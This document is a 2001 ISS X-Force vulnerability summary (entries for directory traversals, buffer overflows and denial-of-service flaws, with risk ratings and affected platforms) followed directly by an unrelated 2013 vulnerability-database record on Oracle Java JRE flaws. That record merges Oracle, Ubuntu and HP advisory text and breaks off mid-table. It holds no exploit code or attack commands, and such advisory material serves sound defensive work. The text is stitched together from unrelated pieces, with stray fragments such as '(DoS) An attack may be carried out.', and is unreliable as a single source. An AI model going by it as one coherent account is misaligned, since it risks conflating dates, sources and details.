Lotus Domino R5 prior to 5.0.7 Vulnerability: lotus-domino-unicode-dos X-Force URL: http://xforce.iss.net/static/6349.php Date Reported: 04/11/2001 Brief Description: Linux mkpasswd generates weak passwords Risk Factor: High Attack Type: Host Based Platforms Affected: Red Hat Linux 6.2, Red Hat Linux 7.0, mkpasswd Vulnerability: mkpasswd-weak-passwords X-Force URL: http://xforce.iss.net/static/6382.php Date Reported: 04/12/2001 Brief Description: Solaris ipcs utility buffer overflow Risk Factor: Medium Attack Type: Host Based / Network Based Platforms Affected: Solaris 7 Vulnerability: solaris-ipcs-bo X-Force URL: http://xforce.iss.net/static/6369.php Date Reported: 04/12/2001 Brief Description: InterScan VirusWall ISADMIN service buffer overflow Risk Factor: Low Attack Type: Network Based Platforms Affected: Linux kernel , InterScan VirusWall 3.0.1 Vulnerability: interscan-viruswall-isadmin-bo X-Force URL: http://xforce.iss.net/static/6368.php Date Reported: 04/12/2001 Brief Description: HylaFAX hfaxd format string Risk Factor: Low Attack Type: Host Based / Network Based Platforms Affected: HylaFAX 4.1B3 and prior, SuSE Linux 6.x, SuSE Linux 7.0, Mandrake Linux 7.1, FreeBSD 3.5.1, Mandrake Linux 7.2, Mandrake Linux Corporate Server 1.0.1, FreeBSD 4.2, SuSE Linux 7.1 Vulnerability: hylafax-hfaxd-format-string X-Force URL: http://xforce.iss.net/static/6377.php Date Reported: 04/12/2001 Brief Description: Cisco VPN 3000 Concentrators invalid IP Option denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: Cisco VPN 3000 Concentrators prior to 2.5.2 F Vulnerability: cisco-vpn-ip-dos X-Force URL: http://xforce.iss.net/static/6360.php Date Reported: 04/13/2001 Brief Description: Net.Commerce package in IBM WebSphere reveals installation path Risk Factor: High Attack Type: Network Based Platforms Affected: IBM Websphere, Solaris 2.6, AIX 4.3.x, Solaris 7, Windows NT 4.0 Vulnerability: ibm-websphere-reveals-path X-Force URL: http://xforce.iss.net/static/6371.php Date Reported: 04/13/2001 Brief Description: QPC ftpd buffer overflow Risk Factor: Medium Attack Type: Host Based / Network Based Platforms Affected: QVT/Term 5.0, QVT/Net 5.0 Vulnerability: qpc-ftpd-bo X-Force URL: http://xforce.iss.net/static/6376.php Date Reported: 04/13/2001 Brief Description: QPC ftpd directory traversal Risk Factor: High Attack Type: Network Based Platforms Affected: QVT/Net 5.0, QVT/Term 5.0 Vulnerability: qpc-ftpd-directory-traversal X-Force URL: http://xforce.iss.net/static/6375.php Date Reported: 04/13/2001 Brief Description: QPC popd buffer overflow Risk Factor: Medium Attack Type: Host Based / Network Based Platforms Affected: QVT/Net 5.0 Vulnerability: qpc-popd-bo X-Force URL: http://xforce.iss.net/static/6374.php Date Reported: 04/13/2001 Brief Description: NCM Content Management System access database Risk Factor: Low Attack Type: Network Based Platforms Affected: NCM Content Management System Vulnerability: ncm-content-database-access X-Force URL: http://xforce.iss.net/static/6386.php Date Reported: 04/13/2001 Brief Description: Netscape SmartDownload 'sdph20.dll' buffer overflow Risk Factor: Low Attack Type: Host Based / Network Based Platforms Affected: Netscape SmartDownload 1.3, Windows NT, Windows 95, Windows 98 Vulnerability: netscape-smartdownload-sdph20-bo X-Force URL: http://xforce.iss.net/static/6403.php Date Reported: 04/13/2001 Brief Description: SCO OpenServer accept buffer overflow Risk Factor: Low Attack Type: Host Based Platforms Affected: SCO Openserver 5.0.0 to 5.0.6 Vulnerability: sco-openserver-accept-bo X-Force URL: http://xforce.iss.net/static/6404.php Date Reported: 04/13/2001 Brief Description: SCO OpenServer cancel buffer overflow Risk Factor: Low Attack Type: Host Based Platforms Affected: SCO Openserver 5.0.0 to 5.0.6 Vulnerability: sco-openserver-cancel-bo X-Force URL: http://xforce.iss.net/static/6406.php Date Reported: 04/13/2001 Brief Description: SCO OpenServer disable buffer overflow Risk Factor: Low Attack Type: Host Based Platforms Affected: SCO Openserver 5.0.0 to 5.0.6 Vulnerability: sco-openserver-disable-bo X-Force URL: http://xforce.iss.net/static/6407.php Date Reported: 04/13/2001 Brief Description: SCO OpenServer enable buffer overflow Risk Factor: Low Attack Type: Host Based Platforms Affected: SCO Openserver 5.0.0 to 5.0.6 Vulnerability: sco-openserver-enable-bo X-Force URL: http://xforce.iss.net/static/6409.php Date Reported: 04/13/2001 Brief Description: SCO OpenServer lp buffer overflow Risk Factor: Low Attack Type: Host Based Platforms Affected: SCO Openserver 5.0.0 to 5.0.6 Vulnerability: sco-openserver-lp-bo X-Force URL: http://xforce.iss.net/static/6410.php Date Reported: 04/13/2001 Brief Description: SCO OpenServer lpfilter buffer overflow Risk Factor: Low Attack Type: Host Based Platforms Affected: SCO Openserver 5.0.0 to 5.0.6 Vulnerability: sco-openserver-lpfilter-bo X-Force URL: http://xforce.iss.net/static/6411.php Date Reported: 04/13/2001 Brief Description: SCO OpenServer lpstat buffer overflow Risk Factor: Low Attack Type: Host Based Platforms Affected: SCO Openserver 5.0.0 to 5.0.6 Vulnerability: sco-openserver-lpstat-bo X-Force URL: http://xforce.iss.net/static/6413.php Date Reported: 04/13/2001 Brief Description: SCO OpenServer reject buffer overflow Risk Factor: Low Attack Type: Host Based Platforms Affected: SCO Openserver 5.0.0 to 5.0.6 Vulnerability: sco-openserver-reject-bo X-Force URL: http://xforce.iss.net/static/6414.php Date Reported: 04/13/2001 Brief Description: SCO OpenServer rmail buffer overflow Risk Factor: Low Attack Type: Host Based Platforms Affected: SCO Openserver 5.0.0 to 5.0.6 Vulnerability: sco-openserver-rmail-bo X-Force URL: http://xforce.iss.net/static/6415.php Date Reported: 04/13/2001 Brief Description: SCO OpenServer tput buffer overflow Risk Factor: Low Attack Type: Host Based Platforms Affected: SCO Openserver 5.0.0 to 5.0.6 Vulnerability: sco-openserver-tput-bo X-Force URL: http://xforce.iss.net/static/6416.php Date Reported: 04/13/2001 Brief Description: IBM WebSphere CGI macro denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: IBM Websphere, Windows NT 4.0, Solaris 2.6, AIX 4.3.x, Solaris 7 Vulnerability: ibm-websphere-macro-dos X-Force URL: http://xforce.iss.net/static/6372.php Date Reported: 04/13/2001 Brief Description: SCO OpenServer lpmove buffer overflow Risk Factor: Low Attack Type: Host Based Platforms Affected: SCO Openserver 5.0.0 to 5.0.6 Vulnerability: sco-openserver-lpmove-bo X-Force URL: http://xforce.iss.net/static/6412.php Date Reported: 04/14/2001 Brief Description: Siemens Reliant Unix ppd -T symlink Risk Factor: Medium Attack Type: Host Based Platforms Affected: Reliant Unix 5.45, Reliant Unix 5.43, Reliant Unix 5.44 Vulnerability: reliant-unix-ppd-symlink X-Force URL: http://xforce.iss.net/static/6408.php Date Reported: 04/15/2001 Brief Description: Linux Exuberant Ctags package symbolic link Risk Factor: Medium Attack Type: Host Based Platforms Affected: Debian Linux 2.2, exuberant-ctags Vulnerability: exuberant-ctags-symlink X-Force URL: http://xforce.iss.net/static/6388.php Date Reported: 04/15/2001 Brief Description: processit.pl CGI could allow attackers to view sensitive information about the Web server Risk Factor: Medium Attack Type: Network Based Platforms Affected: processit.pl Vulnerability: processit-cgi-view-info X-Force URL: http://xforce.iss.net/static/6385.php Date Reported: 04/16/2001 Brief Description: Microsoft ISA Server Web Proxy denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: Microsoft ISA Server 2000 Vulnerability: isa-web-proxy-dos X-Force URL: http://xforce.iss.net/static/6383.php Date Reported: 04/16/2001 Brief Description: Microsoft Internet Explorer altering CLSID action allows malicious file execution Risk Factor: Low Attack Type: Host Based Platforms Affected: Windows 2000, Internet Explorer 5.5, Windows 98 Vulnerability: ie-clsid-execute-files X-Force URL: http://xforce.iss.net/static/6426.php Date Reported: 04/16/2001 Brief Description: Cisco Catalyst 5000 series switch 802.1x denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: Cisco Catalyst 5000 Series Vulnerability: cisco-catalyst-8021x-dos X-Force URL: http://xforce.iss.net/static/6379.php Date Reported: 04/16/2001 Brief Description: BubbleMon allows users to gain elevated privileges Risk Factor: Low Attack Type: Host Based Platforms Affected: BubbleMon prior to 1.32, FreeBSD Vulnerability: bubblemon-elevate-privileges X-Force URL: http://xforce.iss.net/static/6378.php Date Reported: 04/16/2001 Brief Description: DCForum CGI az= field directory traversal Risk Factor: High Attack Type: Network Based Platforms Affected: DCForum 2000 1.0 Vulnerability: dcforum-az-directory-traversal X-Force URL: http://xforce.iss.net/static/6391.php Date Reported: 04/16/2001 Brief Description: DCForum CGI az= field allows attacker to upload files Risk Factor: Low Attack Type: Network Based Platforms Affected: DCForum 2000 1.0 Vulnerability: dcforum-az-file-upload X-Force URL: http://xforce.iss.net/static/6393.php Date Reported: 04/16/2001 Brief Description: DCForum CGI az= field EXPR allows attacker to execute commands Risk Factor: Low Attack Type: Network Based Platforms Affected: DCForum 2000 1.0 Vulnerability: dcforum-az-expr X-Force URL: http://xforce.iss.net/static/6392.php Date Reported: 04/16/2001 Brief Description: Linux NetFilter IPTables Risk Factor: Low Attack Type: Network Based Platforms Affected: Linux kernel 2.4, Red Hat Linux 7.1 Vulnerability: linux-netfilter-iptables X-Force URL: http://xforce.iss.net/static/6390.php Date Reported: 04/17/2001 Brief Description: Xitami Web server denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: Xitami Web server 2.4d7, Xitami Web server 2.5b4 Vulnerability: xitami-server-dos X-Force URL: http://xforce.iss.net/static/6389.php Date Reported: 04/17/2001 Brief Description: Samba tmpfile symlink attack could allow elevated privileges Risk Factor: Low Attack Type: Host Based Platforms Affected: Trustix Secure Linux 1.2, Mandrake Linux 8.0, Progeny Linux, Caldera OpenLinux eBuilder, Trustix Secure Linux 1.01, Mandrake Linux Corporate Server 1.0.1, FreeBSD 4.2, Immunix Linux 7.0, Immunix Linux 6.2, Immunix Linux 7.0 Beta, Caldera OpenLinux eServer 2.3.1, Caldera OpenLinux eDesktop 2.4, FreeBSD 3.5.1 Vulnerability: samba-tmpfile-symlink X-Force URL: http://xforce.iss.net/static/6396.php Date Reported: 04/17/2001 Brief Description: GoAhead WebServer "aux" denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: GoAhead Web Server 2.1, Windows 98, Windows ME Vulnerability: goahead-aux-dos X-Force URL: http://xforce.iss.net/static/6400.php Date Reported: 04/17/2001 Brief Description: AnalogX SimpleServer:WWW "aux" denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: SimpleServer:WWW 1.03 to 1.08 Vulnerability: analogx-simpleserver-aux-dos X-Force URL: http://xforce.iss.net/static/6395.php Date Reported: 04/17/2001 Brief Description: Viking Server hexadecimal URL encoded format directory traversal Risk Factor: Medium Attack Type: Network Based Platforms Affected: Viking Server prior to 1.07-381 Vulnerability: viking-hex-directory-traversal X-Force URL: http://xforce.iss.net/static/6394.php Date Reported: 04/17/2001 Brief Description: Solaris FTP server allows attacker to recover shadow file Risk Factor: Medium Attack Type: Host Based Platforms Affected: Solaris 2.6 Vulnerability: solaris-ftp-shadow-recovery X-Force URL: http://xforce.iss.net/static/6422.php Date Reported: 04/18/2001 Brief Description: The Bat! pop3 denial of service Risk Factor: High Attack Type: Network Based Platforms Affected: The Bat! 1.51, Windows Vulnerability: thebat-pop3-dos X-Force URL: http://xforce.iss.net/static/6423.php Date Reported: 04/18/2001 Brief Description: Eudora allows attacker to obtain files using plain text attachments Risk Factor: Medium Attack Type: Network Based Platforms Affected: Eudora 5.0.2 Vulnerability: eudora-plain-text-attachment X-Force URL: http://xforce.iss.net/static/6431.php Date Reported: 04/18/2001 Brief Description: VMware vmware-mount.pl symlink Risk Factor: Medium Attack Type: Host Based Platforms Affected: VMware Vulnerability: vmware-mount-symlink X-Force URL: http://xforce.iss.net/static/6420.php Date Reported: 04/18/2001 Brief Description: KFM tmpfile symbolic link could allow local attackers to overwrite files Risk Factor: Medium Attack Type: Host Based Platforms Affected: SuSE Linux 7.0, K File Manager (KFM) Vulnerability: kfm-tmpfile-symlink X-Force URL: http://xforce.iss.net/static/6428.php Date Reported: 04/18/2001 Brief Description: CyberScheduler timezone remote buffer overflow Risk Factor: Low Attack Type: Network Based Platforms Affected: CyberScheduler, Mandrake Linux, Windows 2000, IIS 5.0, Solaris 8, SuSE Linux, Solaris 7, Slackware Linux, Red Hat Linux, IIS 4.0, Debian Linux, Solaris 2.5, Solaris 2.6, Caldera OpenLinux, Windows NT Vulnerability: cyberscheduler-timezone-bo X-Force URL: http://xforce.iss.net/static/6401.php Date Reported: 04/18/2001 Brief Description: Microsoft Data Access Component Internet Publishing Provider allows WebDAV access Risk Factor: Medium Attack Type: Network Based Platforms Affected: Microsoft Data Access Component 8.103.2519.0, Windows 95, Windows NT 4.0, Windows 98, Windows 98 Second Edition, Windows 2000, Windows ME Vulnerability: ms-dacipp-webdav-access X-Force URL: http://xforce.iss.net/static/6405.php Date Reported: 04/18/2001 Brief Description: Oracle tnslsnr80.exe denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: Oracle 8.x, Windows NT 4.0 SP6, Solaris 8 Vulnerability: oracle-tnslsnr80-dos X-Force URL: http://xforce.iss.net/static/6427.php Date Reported: 04/18/2001 Brief Description: innfeed -c flag buffer overflow Risk Factor: Low Attack Type: Host Based Platforms Affected: Red Hat Linux, Slackware Linux, Mandrake Linux, INN prior to 2.3.1 Vulnerability: innfeed-c-bo X-Force URL: http://xforce.iss.net/static/6398.php Date Reported: 04/18/2001 Brief Description: iPlanet Calendar Server stores username and password in plaintext Risk Factor: Low Attack Type: Host Based Platforms Affected: iPlanet Calendar Server 5.0p2 Vulnerability: iplanet-calendar-plaintext-password X-Force URL: http://xforce.iss.net/static/6402.php Date Reported: 04/18/2001 Brief Description: Linux NEdit symlink when printing Risk Factor: High Attack Type: Host Based Platforms Affected: SuSE Linux 6.3, SuSE Linux 6.4, Debian Linux 2.2, Mandrake Linux 7.1, Mandrake Linux 7.2, SuSE Linux 7.0, Mandrake Linux Corporate Server 1.0.1, SuSE Linux 7.1, Mandrake Linux 8.0 Vulnerability: nedit-print-symlink X-Force URL: http://xforce.iss.net/static/6424.php Date Reported: 04/19/2001 Brief Description: CheckBO TCP buffer overflow Risk Factor: Medium Attack Type: Network Based Platforms Affected: CheckBO 1.56 and earlier Vulnerability: checkbo-tcp-bo X-Force URL: http://xforce.iss.net/static/6436.php Date Reported: 04/19/2001 Brief Description: HP-UX pcltotiff uses insecure permissions Risk Factor: Medium Attack Type: Host Based Platforms Affected: HP-UX 10.01, HP-UX 10.10, HP-UX 10.20, HP-UX 10.26 Vulnerability: hp-pcltotiff-insecure-permissions X-Force URL: http://xforce.iss.net/static/6447.php Date Reported: 04/19/2001 Brief Description: Netopia Timbuktu allows unauthorized system access Risk Factor: Low Attack Type: Host Based Platforms Affected: Timbuktu Pro, Macintosh OS X Vulnerability: netopia-timbuktu-gain-access X-Force URL: http://xforce.iss.net/static/6452.php Date Reported: 04/20/2001 Brief Description: Cisco CBOS could allow attackers to gain privileged information Risk Factor: High Attack Type: Host Based / Network Based Platforms Affected: Cisco CBOS 2.4.1, Cisco CBOS 2.3.053 Vulnerability: cisco-cbos-gain-information X-Force URL: http://xforce.iss.net/static/6453.php Date Reported: 04/20/2001 Brief Description: Internet Explorer 5.x allows active scripts using XML stylesheets Risk Factor: Low Attack Type: Host Based / Network Based Platforms Affected: Internet Explorer 5.x, Outlook Express 5.x Vulnerability: ie-xml-stylesheets-scripting X-Force URL: http://xforce.iss.net/static/6448.php Date Reported: 04/20/2001 Brief Description: Linux gftp format string Risk Factor: Low Attack Type: Network Based Platforms Affected: gftp prior to 2.0.8, Mandrake Linux 8.0, Mandrake Linux Corporate Server 1.0.1, Immunix Linux 7.0, Red Hat Linux 7.1, Mandrake Linux 7.2, Immunix Linux 6.2, Immunix 7.0 beta, Red Hat Linux 6.2, Mandrake Linux 7.1, Red Hat Linux 7.0 Vulnerability: gftp-format-string X-Force URL: http://xforce.iss.net/static/6478.php Date Reported: 04/20/2001 Brief Description: Novell BorderManager VPN client SYN requests denial of service Risk Factor: Medium Attack Type: Host Based / Network Based Platforms Affected: Novell BorderManager 3.5 Vulnerability: bordermanager-vpn-syn-dos X-Force URL: http://xforce.iss.net/static/6429.php Date Reported: 04/20/2001 Brief Description: SAFT sendfiled could allow the execution of arbitrary code Risk Factor: Low Attack Type: Host Based Platforms Affected: Debian Linux 2.2, Progeny Linux, sendfile Vulnerability: saft-sendfiled-execute-code X-Force URL: http://xforce.iss.net/static/6430.php Date Reported: 04/21/2001 Brief Description: Mercury MTA for Novell Netware buffer overflow Risk Factor: Medium Attack Type: Network Based Platforms Affected: Mercury MTA 1.47 and earlier, Novell NetWare Vulnerability: mercury-mta-bo X-Force URL: http://xforce.iss.net/static/6444.php Date Reported: 04/21/2001 Brief Description: QNX allows attacker to read files on FAT partition Risk Factor: High Attack Type: Host Based / Network Based Platforms Affected: QNX 2.4 Vulnerability: qnx-fat-file-read X-Force URL: http://xforce.iss.net/static/6437.php Date Reported: 04/23/2001 Brief Description: Viking Server "dot dot" (\...\) directory traversal Risk Factor: Medium Attack Type: Network Based Platforms Affected: Viking Server 1.0.7 Vulnerability: viking-dot-directory-traversal X-Force URL: http://xforce.iss.net/static/6450.php Date Reported: 04/24/2001 Brief Description: NetCruiser Web Server could reveal directory path Risk Factor: High Attack Type: Network Based Platforms Affected: NetCruiser Web Server 0.1.2.8 Vulnerability: netcruiser-server-path-disclosure X-Force URL: http://xforce.iss.net/static/6468.php Date Reported: 04/24/2001 Brief Description: Perl Web Server directory traversal Risk Factor: Medium Attack Type: Network Based Platforms Affected: Perl Web Server 0.3 and prior Vulnerability: perl-webserver-directory-traversal X-Force URL: http://xforce.iss.net/static/6451.php Date Reported: 04/24/2001 Brief Description: Small HTTP Server /aux denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: Small HTTP Server 2.03 Vulnerability: small-http-aux-dos X-Force URL: http://xforce.iss.net/static/6446.php Date Reported: 04/24/2001 Brief Description: IPSwitch IMail SMTP daemon mailing list handler buffer overflow Risk Factor: Low Attack Type: Network Based Platforms Affected: IPSwitch Imail 6.06 and earlier Vulnerability: ipswitch-imail-smtp-bo X-Force URL: http://xforce.iss.net/static/6445.php Date Reported: 04/25/2001 Brief Description: MIT Kerberos 5 could allow attacker to gain root access by injecting base64-encoded data Risk Factor: Low Attack Type: Network Based Platforms Affected: MIT Kerberos 5 Vulnerability: kerberos-inject-base64-encode X-Force URL: http://xforce.iss.net/static/6454.php Date Reported: 04/26/2001 Brief Description: IRIX netprint -n allows attacker to access shared library Risk Factor: Low Attack Type: Host Based / Network Based Platforms Affected: IRIX 6.x Vulnerability: irix-netprint-shared-library X-Force URL: http://xforce.iss.net/static/6473.php Date Reported: 04/26/2001 Brief Description: WebXQ "dot dot" directory traversal Risk Factor: High Attack Type: Network Based Platforms Affected: Windows, WebXQ 2.1.204 Vulnerability: webxq-dot-directory-traversal X-Force URL: http://xforce.iss.net/static/6466.php Date Reported: 04/26/2001 Brief Description: RaidenFTPD "dot dot" directory traversal Risk Factor: Medium Attack Type: Network Based Platforms Affected: Windows NT 4.0, Windows 2000, RaidenFTPD 2.1 Vulnerability: raidenftpd-dot-directory-traversal X-Force URL: http://xforce.iss.net/static/6455.php Date Reported: 04/27/2001 Brief Description: PerlCal CGI cal_make.pl script directory traversal Risk Factor: High Attack Type: Network Based Platforms Affected: Unix, PerlCal 2.95 and prior Vulnerability: perlcal-calmake-directory-traversal X-Force URL: http://xforce.iss.net/static/6480.php Date Reported: 04/28/2001 Brief Description: ICQ Web Front plugin denial of service Risk Factor: Medium Attack Type: Network Based Platforms Affected: ICQ Web Front, ICQ 2000b 3278 and earlier Vulnerability: icq-webfront-dos X-Force URL: http://xforce.iss.net/static/6474.php Date Reported: 04/28/2001 Brief Description: Alex FTP Server "dot dot" directory traversal Risk Factor: Medium Attack Type: Network Based Platforms Affected: Alex's FTP Server 0.7 Vulnerability: alex-ftp-directory-traversal X-Force URL: http://xforce.iss.net/static/6475.php Date Reported: 04/28/2001 Brief Description: BRS WebWeaver FTP path disclosure Risk Factor: High Attack Type: Network Based Platforms Affected: BRS WebWeaver 0.63 Vulnerability: webweaver-ftp-path-disclosure X-Force URL: http://xforce.iss.net/static/6477.php Date Reported: 04/28/2001 Brief Description: BRS WebWeaver Web server "dot dot" directory traversal Risk Factor: Medium Attack Type: Network Based Platforms Affected: BRS WebWeaver 0.63 Vulnerability: webweaver-web-directory-traversal X-Force URL: http://xforce.iss.net/static/6476.php Date Reported: 04/29/2001 Brief Description: Winamp AIP buffer overflow Risk Factor: Low Attack Type: Host Based / Network Based Platforms Affected: Winamp 2.6x and 2.7x Vulnerability: winamp-aip-bo X-Force URL: http://xforce.iss.net/static/6479.php Date Reported: 04/29/2001 Brief Description: BearShare "dot dot" allows remote attacker to traverse directories and download any file Risk Factor: Medium Attack Type: Network Based Platforms Affected: BearShare 2.2.2 and prior, Windows 95, Windows 98, Windows ME Vulnerability: bearshare-dot-download-files X-Force URL: http://xforce.iss.net/static/6481.php Date Reported: 05/01/2001 Brief Description: IIS 5.0 ISAPI extension buffer overflow Risk Factor: High Attack Type: Network Based Platforms Affected: IIS 5.0, Windows 2000 Server, Windows 2000 Advanced Server, Windows 2000 Datacenter Server Vulnerability: iis-isapi-bo X-Force URL: http://xforce.iss.net/static/6485.php _____ Risk Factor Key: High Any vulnerability that provides an attacker with immediate access into a machine, gains superuser access, or bypasses a firewall. Example: A vulnerable Sendmail 8.6.5 version that allows an intruder to execute commands on mail server. Medium Any vulnerability that provides information that has a high potential of giving system access to an intruder. Example: A misconfigured TFTP or vulnerable NIS server that allows an intruder to get the password file that could contain an account with a guessable password. Low Any vulnerability that provides information that potentially could lead to a compromise. Example: A finger that allows an intruder to find out who is online and potential accounts to attempt to crack passwords via brute force methods. ________ About Internet Security Systems (ISS) Internet Security Systems is a leading global provider of security management solutions for the Internet, protecting digital assets and ensuring safe and uninterrupted e-business. With its industry-leading intrusion detection and vulnerability assessment software, remote managed security services, and strategic consulting and education offerings, ISS is a trusted security provider to more than 8,000 customers worldwide including 21 of the 25 largest U.S. commercial banks and the top 10 U.S. telecommunications companies. Founded in 1994, ISS is headquartered in Atlanta, GA, with additional offices throughout North America and international operations in Asia, Australia, Europe, Latin America and the Middle East. For more information, visit the Internet Security Systems web site at www.iss.net or call 888-901-7477. Copyright (c) 2001 by Internet Security Systems, Inc. Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. X-Force PGP Key available at: http://xforce.iss.net/sensitive.php as well as on MIT's PGP key server and PGP.com's key server. Please send suggestions, updates, and comments to: X-Force xforce@iss.net of Internet Security Systems, Inc. -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: noconv iQCVAwUBOvrtmTRfJiV99eG9AQFRFwP+NhRj20kY5edBZBvSMBZKAOKEQGpJPPnD J/YCCB9TkzoWt65a7HR6c2MbimbnCo8YrhkjgFcvPmArCOFMS/68lhcStKd769PO rbojCoys8l1woaFDwzPnQeWVoNMen83sVvsiy7Bwk5Sm0cjM3gZC+X0vqG8EI59Y OAtrNiOkj7o= =kYl+ -----END PGP SIGNATURE-----
var-201302-0232 Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to the installation process of the client. Java 7 Update 11, Java 6 Update 38, and earlier versions of Java contain vulnerabilities that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. (DoS) An attack may be carried out. Oracle Java SE is prone to a remote security vulnerability in Java Runtime Environment. This issue affects the 'Install' sub-component. This vulnerability affects the following supported versions: 7 Update 11 and prior, 6 Update 38 and prior Note: This issue was previously discussed in BID 57670 (Oracle Java Runtime Environment Multiple Security Vulnerabilities) but has been given its own record to better document it. ============================================================================ Ubuntu Security Notice USN-1724-1 February 14, 2013 openjdk-6, openjdk-7 vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 12.10 - Ubuntu 12.04 LTS - Ubuntu 11.10 - Ubuntu 10.04 LTS Summary: Several security issues were fixed in OpenJDK. Software Description: - openjdk-7: Open Source Java implementation - openjdk-6: Open Source Java implementation Details: Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit these to cause a denial of service. (CVE-2012-1541, CVE-2012-3342, CVE-2013-0351, CVE-2013-0419, CVE-2013-0423, CVE-2013-0446, CVE-2012-3213, CVE-2013-0425, CVE-2013-0426, CVE-2013-0428, CVE-2013-0429, CVE-2013-0430, CVE-2013-0441, CVE-2013-0442, CVE-2013-0445, CVE-2013-0450, CVE-2013-1475, CVE-2013-1476, CVE-2013-1478, CVE-2013-1480) Vulnerabilities were discovered in the OpenJDK JRE related to information disclosure. (CVE-2013-0409, CVE-2013-0434, CVE-2013-0438) Several data integrity vulnerabilities were discovered in the OpenJDK JRE. (CVE-2013-0424, CVE-2013-0427, CVE-2013-0433, CVE-2013-1473) Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure and data integrity. (CVE-2013-0432, CVE-2013-0435, CVE-2013-0443) A vulnerability was discovered in the OpenJDK JRE related to availability. An attacker could exploit this to cause a denial of service. (CVE-2013-0440) A vulnerability was discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit this to cause a denial of service. (CVE-2013-0444) A data integrity vulnerability was discovered in the OpenJDK JRE. (CVE-2013-0448) An information disclosure vulnerability was discovered in the OpenJDK JRE. (CVE-2013-0449) A vulnerability was discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit this to cause a denial of service. (CVE-2013-1481) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 12.10: icedtea-7-jre-jamvm 7u13-2.3.6-0ubuntu0.12.10.1 openjdk-7-jre 7u13-2.3.6-0ubuntu0.12.10.1 openjdk-7-jre-headless 7u13-2.3.6-0ubuntu0.12.10.1 openjdk-7-jre-lib 7u13-2.3.6-0ubuntu0.12.10.1 openjdk-7-jre-zero 7u13-2.3.6-0ubuntu0.12.10.1 Ubuntu 12.04 LTS: icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.12.04.2 icedtea-6-jre-jamvm 6b27-1.12.1-2ubuntu0.12.04.2 openjdk-6-jre 6b27-1.12.1-2ubuntu0.12.04.2 openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.12.04.2 openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.12.04.2 openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.12.04.2 Ubuntu 11.10: icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.11.10.2 icedtea-6-jre-jamvm 6b27-1.12.1-2ubuntu0.11.10.2 openjdk-6-jre 6b27-1.12.1-2ubuntu0.11.10.2 openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.11.10.2 openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.11.10.2 openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.11.10.2 Ubuntu 10.04 LTS: icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.10.04.2 openjdk-6-jre 6b27-1.12.1-2ubuntu0.10.04.2 openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.10.04.2 openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.10.04.2 openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.10.04.2 This update uses a new upstream release which includes additional bug fixes. After a standard system update you need to restart any Java applications or applets to make all the necessary changes. Release Date: 2013-04-29 Last Updated: 2013-04-29 Potential Security Impact: Java Runtime Environment (JRE) security update Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Several potential security vulnerabilities have been identified with HP Service Manager for Windows, Linux, HP-UX, Solaris and AIX. References: CVE-2013-1487, CVE-2013-1486, CVE-2013-1484,CVE-2013-1485,CVE-2013-0169, CVE-2013-0437, CVE-2013-1478, CVE-2013-0442, CVE-2013-0445, CVE-2013-1480, CVE-2013-0441, CVE-2013-1475, CVE-2013-1476, CVE-2012-1541, CVE-2013-0446, CVE-2012-3342, CVE-2013-0450, CVE-2013-1479, CVE-2013-0425, CVE-2013-0426, CVE-2013-0428, CVE-2012-3213, CVE-2013-1481, CVE-2013-0436, CVE-2013-0439, CVE-2013-0447, CVE-2013-1472, CVE-2012-4301, CVE-2013-1477, CVE-2013-1482, CVE-2013-1483, CVE-2013-1474, CVE-2012-4305, CVE-2013-0444, CVE-2013-0429, CVE-2013-0419, CVE-2013-0423, CVE-2012-1543, CVE-2013-0351, CVE-2013-0430, CVE-2013-0432, CVE-2013-0449, CVE-2013-1473, CVE-2013-0435, CVE-2013-0434, CVE-2013-0409, CVE-2013-0431, CVE-2013-0427, CVE-2013-0448, CVE-2013-0433, CVE-2013-0424, CVE-2013-0440, CVE-2013-0438, CVE-2013-0443, CVE-2013-1489 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Service Manager for Windows, Linux, HP-UX, Solaris and AIX v 9.30, v9.31 BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2012-1541 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-1543 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2012-3213 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-3342 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 